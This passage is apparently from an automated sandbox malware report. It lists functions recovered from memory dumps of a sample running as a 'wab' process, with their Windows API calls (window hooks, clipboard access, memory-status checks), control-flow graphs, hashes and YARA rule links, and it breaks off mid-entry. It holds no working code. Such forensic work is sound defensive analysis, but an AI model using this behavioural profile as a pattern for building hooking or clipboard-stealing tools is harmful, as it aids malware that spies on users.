                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAC1E0 Relevance: .6, Instructions: 647COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: feec0375c75381c576d6cb54def798291f583b8b4e66f088b2d36ce1ce21a608
                                                                                    • Instruction ID: 0b0542362f86da622345e4c5d45c4b68a5f627fe417582e65e574068de1239cd
                                                                                    • Opcode Fuzzy Hash: feec0375c75381c576d6cb54def798291f583b8b4e66f088b2d36ce1ce21a608
                                                                                    • Instruction Fuzzy Hash: 2C325D34B002168FDB15DF6CD880AAEB7B3FB89714F108929E905E7355DB79DD428B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA55E0 Relevance: .6, Instructions: 606COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 966a04dee18853535f2973dee0baf5ce194cb89a6168ce48c3ca7a3478b2f566
                                                                                    • Instruction ID: e1a7979bc9d3f744ca274dd1780475d4d3aa54aecae82393d2842f30f8227ba6
                                                                                    • Opcode Fuzzy Hash: 966a04dee18853535f2973dee0baf5ce194cb89a6168ce48c3ca7a3478b2f566
                                                                                    • Instruction Fuzzy Hash: CA22A171F002668FDB11DFA8D48069EBBB3FF89320F248469D946AB345DA35DD42CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C89D61 Relevance: 6.1, APIs: 4, Instructions: 137threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 677 24c89d61-24c89dff GetCurrentProcess 681 24c89e08-24c89e3c GetCurrentThread 677->681 682 24c89e01-24c89e07 677->682 683 24c89e3e-24c89e44 681->683 684 24c89e45-24c89e79 GetCurrentProcess 681->684 682->681 683->684 686 24c89e7b-24c89e81 684->686 687 24c89e82-24c89e9d call 24c89f40 684->687 686->687 690 24c89ea3-24c89ed2 GetCurrentThreadId 687->690 691 24c89edb-24c89f3d 690->691 692 24c89ed4-24c89eda 690->692 692->691
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 24C89DEE
                                                                                    • GetCurrentThread.KERNEL32 ref: 24C89E2B
                                                                                    • GetCurrentProcess.KERNEL32 ref: 24C89E68
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 24C89EC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ProcessThread
                                                                                    • String ID:
                                                                                    • API String ID: 2063062207-0
                                                                                    • Opcode ID: 5f7686167965e4106dbf38161c570c9d49a0a2edf3a8a6d637a26ababdbe4f75
                                                                                    • Instruction ID: d99406dd17c8449a108c15f4d48ab01144fc120844e1ced39b849aec304bbc8e
                                                                                    • Opcode Fuzzy Hash: 5f7686167965e4106dbf38161c570c9d49a0a2edf3a8a6d637a26ababdbe4f75
                                                                                    • Instruction Fuzzy Hash: 605137B19043499FDB09DFA9D588BAEBFF1FF88314F208459D009A7291DB749940CB66
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C89D70 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 699 24c89d70-24c89dff GetCurrentProcess 703 24c89e08-24c89e3c GetCurrentThread 699->703 704 24c89e01-24c89e07 699->704 705 24c89e3e-24c89e44 703->705 706 24c89e45-24c89e79 GetCurrentProcess 703->706 704->703 705->706 708 24c89e7b-24c89e81 706->708 709 24c89e82-24c89e9d call 24c89f40 706->709 708->709 712 24c89ea3-24c89ed2 GetCurrentThreadId 709->712 713 24c89edb-24c89f3d 712->713 714 24c89ed4-24c89eda 712->714 714->713
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 24C89DEE
                                                                                    • GetCurrentThread.KERNEL32 ref: 24C89E2B
                                                                                    • GetCurrentProcess.KERNEL32 ref: 24C89E68
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 24C89EC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ProcessThread
                                                                                    • String ID:
                                                                                    • API String ID: 2063062207-0
                                                                                    • Opcode ID: 31cae9709d015d966374e9f22db7d055bf947175dbd933ef01bbdc708874a4fd
                                                                                    • Instruction ID: 7698aa9a23cd631516f84aae0d653db1009ab74147c7e9a68f883abef0913fee
                                                                                    • Opcode Fuzzy Hash: 31cae9709d015d966374e9f22db7d055bf947175dbd933ef01bbdc708874a4fd
                                                                                    • Instruction Fuzzy Hash: BD5129B09007499FDB49DFADD548BAEBFF1EF88314F208559D009A7390DB749940CB65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C89B6C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1170 24c89b6c-24c8ae84 1173 24c8ae8a-24c8ae8f 1170->1173 1174 24c8af34-24c8af54 call 24c84504 1170->1174 1175 24c8ae91-24c8aec8 1173->1175 1176 24c8aee2-24c8af1a CallWindowProcW 1173->1176 1182 24c8af57-24c8af64 1174->1182 1184 24c8aeca-24c8aed0 1175->1184 1185 24c8aed1-24c8aee0 1175->1185 1178 24c8af1c-24c8af22 1176->1178 1179 24c8af23-24c8af32 1176->1179 1178->1179 1179->1182 1184->1185 1185->1182
                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 24C8AF09
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID: ,!
                                                                                    • API String ID: 2714655100-1623472995
                                                                                    • Opcode ID: e7004734325548e388dd44c4fa416491898e2470f4173d7ea0a525aee5eeacf1
                                                                                    • Instruction ID: 5bb599ffde566c6c8d1303a1b3ddce413241d4074cff77bca4c5fb60fe2611b7
                                                                                    • Opcode Fuzzy Hash: e7004734325548e388dd44c4fa416491898e2470f4173d7ea0a525aee5eeacf1
                                                                                    • Instruction Fuzzy Hash: 4C413BB5900305CFDB05CF59C484B9ABBF5FF88314F248859E519A7361D775A841CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA20B0 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2212 24ca20b0-24ca20d8 2213 24ca20da-24ca20dd 2212->2213 2214 24ca20df-24ca20fb 2213->2214 2215 24ca2100-24ca2103 2213->2215 2214->2215 2216 24ca213c-24ca213e 2215->2216 2217 24ca2105-24ca2137 2215->2217 2219 24ca2140 2216->2219 2220 24ca2145-24ca2148 2216->2220 2217->2216 2219->2220 2220->2213 2221 24ca214a-24ca2159 2220->2221 2224 24ca215b-24ca2162 2221->2224 2225 24ca21c3-24ca21d8 2221->2225 2226 24ca21b2-24ca21c1 2224->2226 2227 24ca2164 2224->2227 2230 24ca21d9 2225->2230 2226->2224 2226->2225 2236 24ca2167 call 24ca21ed 2227->2236 2237 24ca2167 call 24ca2200 2227->2237 2229 24ca216d-24ca218b 2238 24ca218e call 24ca21ed 2229->2238 2239 24ca218e call 24ca2200 2229->2239 2230->2230 2234 24ca2194-24ca2197 2235 24ca219f-24ca21aa 2234->2235 2235->2226 2236->2229 2237->2229 2238->2234 2239->2234
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @1^$$@1^$
                                                                                    • API String ID: 0-216816597
                                                                                    • Opcode ID: 33cfb1f25dba4ab2e29c8b9cf42c3d14e204b99744a46da0e7728bf7d8c515fb
                                                                                    • Instruction ID: 9ec554791fe108688ca69f05bfdc4d42cbc9e30e2179804353af85b54439af7b
                                                                                    • Opcode Fuzzy Hash: 33cfb1f25dba4ab2e29c8b9cf42c3d14e204b99744a46da0e7728bf7d8c515fb
                                                                                    • Instruction Fuzzy Hash: C8316F35E002269BCB05CFA5C89869EB7F3BF89310F108529E906EB354DB75AD428B40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA20C0 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2240 24ca20c0-24ca20d8 2241 24ca20da-24ca20dd 2240->2241 2242 24ca20df-24ca20fb 2241->2242 2243 24ca2100-24ca2103 2241->2243 2242->2243 2244 24ca213c-24ca213e 2243->2244 2245 24ca2105-24ca2137 2243->2245 2247 24ca2140 2244->2247 2248 24ca2145-24ca2148 2244->2248 2245->2244 2247->2248 2248->2241 2249 24ca214a-24ca2159 2248->2249 2252 24ca215b-24ca2162 2249->2252 2253 24ca21c3-24ca21d8 2249->2253 2254 24ca21b2-24ca21c1 2252->2254 2255 24ca2164 2252->2255 2258 24ca21d9 2253->2258 2254->2252 2254->2253 2264 24ca2167 call 24ca21ed 2255->2264 2265 24ca2167 call 24ca2200 2255->2265 2257 24ca216d-24ca218b 2266 24ca218e call 24ca21ed 2257->2266 2267 24ca218e call 24ca2200 2257->2267 2258->2258 2262 24ca2194-24ca2197 2263 24ca219f-24ca21aa 2262->2263 2263->2254 2264->2257 2265->2257 2266->2262 2267->2262
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @1^$$@1^$
                                                                                    • API String ID: 0-216816597
                                                                                    • Opcode ID: 7073954353842b63550b42a51bef4492a10456ec2ff4a7b08481a61d322664e6
                                                                                    • Instruction ID: ad583a7a9d640ef2253ae07519dd65a53cbb86e02ba9dfd808f64af59e8b9d56
                                                                                    • Opcode Fuzzy Hash: 7073954353842b63550b42a51bef4492a10456ec2ff4a7b08481a61d322664e6
                                                                                    • Instruction Fuzzy Hash: 06313035F002269BCB05CFA9C894A9EB7B3BF89300F208519E916EB354DB75AD46CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C84E6B Relevance: 1.8, APIs: 1, Instructions: 302COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 101d29762b152d1dba29b49a4e442ec83580aff664c2c84f3e46850fe115b802
                                                                                    • Instruction ID: ccf32c9b993abd0f96b63891e8389352dda98e0637b3aea33a4224c4da1151da
                                                                                    • Opcode Fuzzy Hash: 101d29762b152d1dba29b49a4e442ec83580aff664c2c84f3e46850fe115b802
                                                                                    • Instruction Fuzzy Hash: 06B18D75A007059FDB06DF79C884A6EBBF2FF88218B00896DD40ADB755EB74E901CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAAD20 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DR^$
                                                                                    • API String ID: 0-1110539939
                                                                                    • Opcode ID: 90a5125568e0dba4c1f8bfb7739b08342ec1b9069550cf94c678a08ac76656b6
                                                                                    • Instruction ID: 88d44bb1cb64e3255194ca74baf57a92e23c7503d6bbfa4bc43a689a6e83d116
                                                                                    • Opcode Fuzzy Hash: 90a5125568e0dba4c1f8bfb7739b08342ec1b9069550cf94c678a08ac76656b6
                                                                                    • Instruction Fuzzy Hash: 3EE17F70F0021A8BDB19DF69D88469EBBB3FF88304F208929D905EB345DB759D42CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 027CEB68 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3595403586.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_27c0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ef3793240b4e0543d1ade10356afcdd7cd615d6c3fe564e3ead469deb2b73691
                                                                                    • Instruction ID: 8a79db501790afbc2ed08443625e14422a0bdd7b2e18b3f6298c9801f8e97eaa
                                                                                    • Opcode Fuzzy Hash: ef3793240b4e0543d1ade10356afcdd7cd615d6c3fe564e3ead469deb2b73691
                                                                                    • Instruction Fuzzy Hash: 9E41E272E047598FCB14DFBAE4047EEBBF1AF89310F14856AD948A7241EB749845CBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C8624C Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24C8636A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 2412aa2d21b4c546a0efa3ca24cab14b5a66abee173c6f18e62bdc749f7f3618
                                                                                    • Instruction ID: d120b37295f587623e508bdce2bd4a8189eaec63e77c5321a107441b60deeeaf
                                                                                    • Opcode Fuzzy Hash: 2412aa2d21b4c546a0efa3ca24cab14b5a66abee173c6f18e62bdc749f7f3618
                                                                                    • Instruction Fuzzy Hash: 3351DFB1D00309DFDB15CFAAD880ADEBFB2BF48714F20852AE818AB210D7749845CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C86258 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24C8636A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 2d11fd963e0fa9b103dba9a8bea5eaf484e287ddebba75d0c7ea02474956fb21
                                                                                    • Instruction ID: f00b461038830224247d25b79efed6412a588de2fbd5b699fec6828dc6e60e1d
                                                                                    • Opcode Fuzzy Hash: 2d11fd963e0fa9b103dba9a8bea5eaf484e287ddebba75d0c7ea02474956fb21
                                                                                    • Instruction Fuzzy Hash: 4941C0B1D00309DFDB15CF9AD984ADEBFB6BF48714F20812AE818AB210D7759845CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C8BB84 Relevance: 1.6, APIs: 1, Instructions: 75comclipboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard
                                                                                    • String ID:
                                                                                    • API String ID: 220874293-0
                                                                                    • Opcode ID: a8269a47cfd9b1ce9fdc3a74b5fdf4e552e98f07c315db8128b19b3bd3888bbd
                                                                                    • Instruction ID: ca8579cc4b5bb538ad9088261f5bf5c0484f164365a0458249fbbb999d3c5306
                                                                                    • Opcode Fuzzy Hash: a8269a47cfd9b1ce9fdc3a74b5fdf4e552e98f07c315db8128b19b3bd3888bbd
                                                                                    • Instruction Fuzzy Hash: 863102B0E01248DFDB11CFA9C984BDEBBF1AF58714F208059E518AB390DBB4A845CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C8B580 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard
                                                                                    • String ID:
                                                                                    • API String ID: 220874293-0
                                                                                    • Opcode ID: fa50a38f482e3c58633569142b3e884fafbf3ed9821fd90ae884840d4c62520f
                                                                                    • Instruction ID: 1604cfbfc70ea6aca1c5d2f9ee8c953a35e62f9326840c3a7ad3d02bb9421278
                                                                                    • Opcode Fuzzy Hash: fa50a38f482e3c58633569142b3e884fafbf3ed9821fd90ae884840d4c62520f
                                                                                    • Instruction Fuzzy Hash: 4531E2B0D0120CDFDB11CF99C984B9EBBF6BF48714F208059E504AB394EBB4A845CB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C89FB0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 24C8A03F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: c05b7055a21575bcb5a313d6fd611d0ae5019f4e75dd542c20092cd15015f856
                                                                                    • Instruction ID: 60d49bb14e189e07450efced6bbf613c80c380e6cc76c201dbec378d0968ef9d
                                                                                    • Opcode Fuzzy Hash: c05b7055a21575bcb5a313d6fd611d0ae5019f4e75dd542c20092cd15015f856
                                                                                    • Instruction Fuzzy Hash: 282103B59002489FDB10CFAAD585ADEBFF4FF48320F10841AE958A7310D379A950CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C89FB8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 24C8A03F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 08ce46c1f5a7739a760de0d4d304ae0d907b7edf725f746164f83ab78da6cb99
                                                                                    • Instruction ID: 9591879ddade9490e5064ce80a0cb8f6d6688f7574348c39ab6aff7582f3df79
                                                                                    • Opcode Fuzzy Hash: 08ce46c1f5a7739a760de0d4d304ae0d907b7edf725f746164f83ab78da6cb99
                                                                                    • Instruction Fuzzy Hash: 1921E3B59002099FDB10CFAAD984ADEBBF4FB48320F10801AE914A3350D379A950CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C8D6C9 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 24C8D74B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: HookWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2559412058-0
                                                                                    • Opcode ID: aca4207579fcc8dd9a3a58361bd61e110df3915ea95eddec29df9cd74120aaaa
                                                                                    • Instruction ID: bd7ec29f767cf418cd1d5be9eb03458f312ad6f2cac95ae3abcfdb8102706102
                                                                                    • Opcode Fuzzy Hash: aca4207579fcc8dd9a3a58361bd61e110df3915ea95eddec29df9cd74120aaaa
                                                                                    • Instruction Fuzzy Hash: E12115B5D002498FDB00CFA9D945BDEBBF5EF88320F10842AD459A7250D7B4A944CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C8D6D0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 24C8D74B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: HookWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2559412058-0
                                                                                    • Opcode ID: 5dd3f50da053b57c1b7c02405695ba6970245279691984c9ef6de8e19d98d654
                                                                                    • Instruction ID: 8b43a47dd9b6c50185b26f76c079a19189d19b974d72fc6cd87d96afefa08614
                                                                                    • Opcode Fuzzy Hash: 5dd3f50da053b57c1b7c02405695ba6970245279691984c9ef6de8e19d98d654
                                                                                    • Instruction Fuzzy Hash: 8A2127B5D002498FDB00CF9AD944BDEFBF5BF88310F10842AD459A7250D7B4A940CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 027CE2D0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,027CEBBA), ref: 027CECA7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3595403586.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_27c0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemoryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1890195054-0
                                                                                    • Opcode ID: aaba8dbfd89317cb5c17dc0387041c8c47beb831eb9fe3db3da28604a9c4827a
                                                                                    • Instruction ID: 6243ba266e31c7e931807e3011c543d8ec32642bd37b93a81e3bbb708d94519f
                                                                                    • Opcode Fuzzy Hash: aaba8dbfd89317cb5c17dc0387041c8c47beb831eb9fe3db3da28604a9c4827a
                                                                                    • Instruction Fuzzy Hash: B81136B1C006599BCB10CFAAC545B9EFBF4AF48324F10816AD918B7240D3B8A910CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 027CEC38 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,027CEBBA), ref: 027CECA7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3595403586.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_27c0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemoryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1890195054-0
                                                                                    • Opcode ID: b04c727c4941ae9d42d3f00e57e8dc5db0a0fdebfaab5223b5e0f1192d5f897a
                                                                                    • Instruction ID: 9f6f376ed6ce8ffac7a363bdd838029301aac68ad7bc411c5322b4d025894008
                                                                                    • Opcode Fuzzy Hash: b04c727c4941ae9d42d3f00e57e8dc5db0a0fdebfaab5223b5e0f1192d5f897a
                                                                                    • Instruction Fuzzy Hash: 331129B2C006599FCB10CFAAD545BDEFBF4BF48724F11816AD918A7241D3B8A950CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C8371C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 24C85216
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: dbdc0015669b07129c7801af9e2fafc7a887b6e31d5822a5fe6699973bf397bc
                                                                                    • Instruction ID: e66a87b47c43296671de4e42e70f5c4541fd6e180d9e42ac3af21d47883536a6
                                                                                    • Opcode Fuzzy Hash: dbdc0015669b07129c7801af9e2fafc7a887b6e31d5822a5fe6699973bf397bc
                                                                                    • Instruction Fuzzy Hash: F51132B5C002498FCB10CF9AD444B9EFBF6EF88224F10841AD928B7200D3B5A500CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C8B468 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 24C8BA9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 11e595859ccb785b99dbc65c189d59e73e693e033e5c2cda6269592eed8ec56f
                                                                                    • Instruction ID: 057be30b4aac533755078ae01c6f1fe8ae3c534f554fc3a4d1106a9454627099
                                                                                    • Opcode Fuzzy Hash: 11e595859ccb785b99dbc65c189d59e73e693e033e5c2cda6269592eed8ec56f
